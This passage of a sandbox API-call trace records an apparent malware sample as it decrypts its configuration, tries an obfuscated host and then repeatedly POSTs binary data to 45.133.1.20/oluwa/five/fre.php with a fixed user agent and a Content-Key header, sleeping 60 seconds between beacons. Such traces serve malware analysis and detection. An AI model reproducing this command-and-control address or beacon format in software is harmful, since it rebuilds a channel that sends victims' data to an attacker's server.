[0184.605] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.606] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.606] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.607] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.607] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.611] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.611] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.612] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.612] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.612] GetProcessHeap () returned 0x6a0000 [0184.612] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0184.612] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.612] GetProcessHeap () returned 0x6a0000 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0184.613] GetProcessHeap () returned 0x6a0000 [0184.613] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.614] GetProcessHeap () returned 0x6a0000 [0184.614] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.614] GetProcessHeap () returned 0x6a0000 [0184.614] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4a30 [0184.615] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.615] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.622] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.622] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0184.633] GetProcessHeap () returned 0x6a0000 [0184.633] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.634] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.635] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0184.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.636] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.637] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.637] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.638] GetProcessHeap () returned 0x6a0000 [0184.638] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.639] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.643] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4a30, pdwDataLen=0x19fcfc | out: pbData=0x6b4a30, pdwDataLen=0x19fcfc) returned 1 [0184.644] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.644] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0184.645] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.646] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0184.646] GetProcessHeap () returned 0x6a0000 [0184.646] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.647] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.647] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0184.648] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.649] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0184.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.650] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0184.651] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.654] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0184.654] GetProcessHeap () returned 0x6a0000 [0184.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0184.654] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bf9b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0184.654] GetProcessHeap () returned 0x6a0000 [0184.654] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6ba970 [0184.654] socket (af=2, type=1, protocol=6) returned 0x42c [0184.655] connect (s=0x42c, name=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0184.682] FreeAddrInfoW (pAddrInfo=0x6bf9b8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be9d0*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0184.682] GetProcessHeap () returned 0x6a0000 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf168 [0184.682] GetProcessHeap () returned 0x6a0000 [0184.682] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0184.683] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.685] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.686] GetProcessHeap () returned 0x6a0000 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0184.686] GetProcessHeap () returned 0x6a0000 [0184.686] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.686] GetProcessHeap () returned 0x6a0000 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0184.686] GetProcessHeap () returned 0x6a0000 [0184.686] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0184.687] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.688] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.688] GetProcessHeap () returned 0x6a0000 [0184.688] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0184.688] GetProcessHeap () returned 0x6a0000 [0184.689] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.689] send (s=0x42c, buf=0x6bbd20*, len=242, flags=0) returned 242 [0184.691] send (s=0x42c, buf=0x6bb998*, len=159, flags=0) returned 159 [0184.691] GetProcessHeap () returned 0x6a0000 [0184.691] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0184.691] recv (in: s=0x42c, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0184.757] GetProcessHeap () returned 0x6a0000 [0184.757] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0184.757] GetProcessHeap () returned 0x6a0000 [0184.758] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.759] GetProcessHeap () returned 0x6a0000 [0184.759] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0184.759] GetProcessHeap () returned 0x6a0000 [0184.760] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf168 | out: hHeap=0x6a0000) returned 1 [0184.760] closesocket (s=0x42c) returned 0 [0184.764] GetProcessHeap () returned 0x6a0000 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba970 | out: hHeap=0x6a0000) returned 1 [0184.764] GetProcessHeap () returned 0x6a0000 [0184.764] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.765] GetProcessHeap () returned 0x6a0000 [0184.765] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0184.765] GetProcessHeap () returned 0x6a0000 [0184.766] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0184.766] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1118) returned 0x42c [0184.768] Sleep (dwMilliseconds=0xea60) [0184.770] GetProcessHeap () returned 0x6a0000 [0184.770] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0184.771] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.773] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.781] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.782] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0184.791] GetProcessHeap () returned 0x6a0000 [0184.792] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.792] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.793] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0184.794] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.794] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.798] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.798] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.798] GetProcessHeap () returned 0x6a0000 [0184.799] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.800] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.800] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0184.801] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.801] CryptDestroyKey (hKey=0x6ad020) returned 1 [0184.802] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.811] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0184.811] GetProcessHeap () returned 0x6a0000 [0184.811] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.812] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.813] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0184.813] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.814] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0184.814] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.815] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0184.819] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.819] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0184.819] GetProcessHeap () returned 0x6a0000 [0184.819] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.819] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0184.819] GetProcessHeap () returned 0x6a0000 [0184.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.820] GetProcessHeap () returned 0x6a0000 [0184.820] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.820] GetProcessHeap () returned 0x6a0000 [0184.821] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0184.821] GetProcessHeap () returned 0x6a0000 [0184.821] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0184.822] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.822] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0184.834] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.835] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beb90) returned 1 [0184.848] GetProcessHeap () returned 0x6a0000 [0184.848] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0184.851] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.851] CryptImportKey (in: hProv=0x6beb90, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0184.852] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.852] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0184.853] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.853] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0184.853] GetProcessHeap () returned 0x6a0000 [0184.854] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0184.854] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.855] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0184.855] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.856] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0184.856] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.857] CryptReleaseContext (hProv=0x6beb90, dwFlags=0x0) returned 1 [0184.857] GetProcessHeap () returned 0x6a0000 [0184.857] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0184.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.858] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0184.858] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.859] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0184.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.862] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0184.862] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0184.863] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0184.863] GetProcessHeap () returned 0x6a0000 [0184.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0184.863] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6bfaa8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0184.863] GetProcessHeap () returned 0x6a0000 [0184.863] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa70 [0184.863] socket (af=2, type=1, protocol=6) returned 0x430 [0184.863] connect (s=0x430, name=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0184.885] FreeAddrInfoW (pAddrInfo=0x6bfaa8*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6be7d8*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0184.886] GetProcessHeap () returned 0x6a0000 [0184.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bf278 [0184.886] GetProcessHeap () returned 0x6a0000 [0184.886] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6c4710 [0184.886] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.887] wvsprintfA (in: param_1=0x6c4710, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0184.887] GetProcessHeap () returned 0x6a0000 [0184.887] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6bbc60 [0184.887] GetProcessHeap () returned 0x6a0000 [0184.888] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.888] GetProcessHeap () returned 0x6a0000 [0184.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b49a0 [0184.888] GetProcessHeap () returned 0x6a0000 [0184.888] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6c4710 [0184.889] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0184.890] wvsprintfA (in: param_1=0x6c4710, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0184.890] GetProcessHeap () returned 0x6a0000 [0184.890] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bbd20 [0184.890] GetProcessHeap () returned 0x6a0000 [0184.890] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c4710 | out: hHeap=0x6a0000) returned 1 [0184.890] send (s=0x430, buf=0x6bbd20*, len=242, flags=0) returned 242 [0184.891] send (s=0x430, buf=0x6bb998*, len=159, flags=0) returned 159 [0184.891] GetProcessHeap () returned 0x6a0000 [0184.891] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c4710 [0184.891] recv (in: s=0x430, buf=0x6c4710, len=4048, flags=0 | out: buf=0x6c4710*) returned 204 [0184.985] GetProcessHeap () returned 0x6a0000 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbd20 | out: hHeap=0x6a0000) returned 1 [0184.986] GetProcessHeap () returned 0x6a0000 [0184.986] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b49a0 | out: hHeap=0x6a0000) returned 1 [0184.986] GetProcessHeap () returned 0x6a0000 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bbc60 | out: hHeap=0x6a0000) returned 1 [0184.987] GetProcessHeap () returned 0x6a0000 [0184.987] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bf278 | out: hHeap=0x6a0000) returned 1 [0184.987] closesocket (s=0x430) returned 0 [0184.988] GetProcessHeap () returned 0x6a0000 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa70 | out: hHeap=0x6a0000) returned 1 [0184.988] GetProcessHeap () returned 0x6a0000 [0184.988] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6de0 | out: hHeap=0x6a0000) returned 1 [0184.988] GetProcessHeap () returned 0x6a0000 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0184.989] GetProcessHeap () returned 0x6a0000 [0184.989] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0184.989] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c4710, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x112c) returned 0x430 [0184.991] Sleep (dwMilliseconds=0xea60) [0184.993] GetProcessHeap () returned 0x6a0000 [0184.993] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b49a0 [0184.993] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0184.994] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0185.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.001] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bed28) returned 1 [0185.013] GetProcessHeap () returned 0x6a0000 [0185.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0185.013] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.014] CryptImportKey (in: hProv=0x6bed28, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0185.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.018] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0185.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.020] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0185.020] GetProcessHeap () returned 0x6a0000 [0185.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0185.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.022] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b49a0, pdwDataLen=0x19fcfc | out: pbData=0x6b49a0, pdwDataLen=0x19fcfc) returned 1 [0185.023] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.023] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0185.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0185.024] CryptReleaseContext (hProv=0x6bed28, dwFlags=0x0) returned 1 [0185.024] GetProcessHeap () returned 0x6a0000 [0185.025] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6b6de0 [0185.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.032] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0185.033] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.033] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0185.034] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0185.035] StrStrA 